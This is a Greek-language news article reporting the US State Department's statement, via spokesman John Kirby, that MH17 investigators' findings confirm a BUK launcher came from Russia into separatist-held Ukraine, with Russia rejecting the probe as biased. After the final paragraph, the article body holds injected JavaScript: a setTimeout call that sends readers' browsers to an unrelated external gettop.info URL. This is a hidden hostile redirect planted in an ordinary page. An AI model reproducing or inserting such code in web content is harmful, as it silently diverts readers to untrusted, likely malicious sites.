Στέιτ Ντιπάρτμεντ: Επιβεβαιώνονται οι υποψίες για ρωσική εμπλοκή στην κατάρριψη της ΜΗ17

0
5

 

Τα πορίσματα της διεθνούς ομάδας ερευνητών σύμφωνα με τα οποία ο πύραυλος που κατέρριψε το αεροοπλάνο των Μαλαισιανών Αερογραμμών στην ανατολική Ουκρανία είχε μεταφερθεί από τη Ρωσία σε φιλορωσικό χωριό της Ουκρανίας απ’ όπου κι εκτοξεύτηκε, προκάλεσε την αντίδραση του Στέιτ Ντιπάρτμεντ.

Σύμφωνα με τους Αμερικανούς αξιωματούχους, επιβεβαιώνονται οι υποψίες ότι υπάρχει ρωσική εμπλοκή στο αεροπορικό αυτό δυστύχημα.

«Τα προσωρινά συμπεράσματα επιβεβαιώνουν τη δήλωση του υπουργού Εξωτερικών Τζον Κέρι μερικές ημέρες μετά την τραγωδία σύμφωνα με την οποία, η πτήση ΜΗ17 καταρρίφθηκε από πύραυλο αέρους-εδάφους BUK που εκτοξεύθηκε από έδαφος ελεγχόμενο από φιλορώσους αυτονομιστές στην ανατολική Ουκρανία«, δήλωσε ο εκπρόσωπος του Στέιτ Ντιπάρτμεντ Τζον Κίρμπι.

«Δεν υπάρχει καμία αμφιβολία» για τα πορίσματα αυτά, τόνισε.

Ο Κίρμπι σημείωσε επίσης ότι η έρευνα είχεκαταλήξει στο συμπέρασμα ότι ο «εκτοξευτήρας του πυραύλου BUK είχε μεταφερθεί από τη Ρωσία προς το ελεγχόμενο από τους αυτονομιστές έδαφος στην Ουκρανία πριν από το περιστατικό και στη συνέχεια επιστράφηκε στη Ρωσία μετά την κατάρριψη της πτήσης ΜΗ17″.

Η Ρωσία χαρακτήρισε τη διεθνή ποινική έρευνα «μεροληπτική» και «πολιτικά υποκινούμενη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here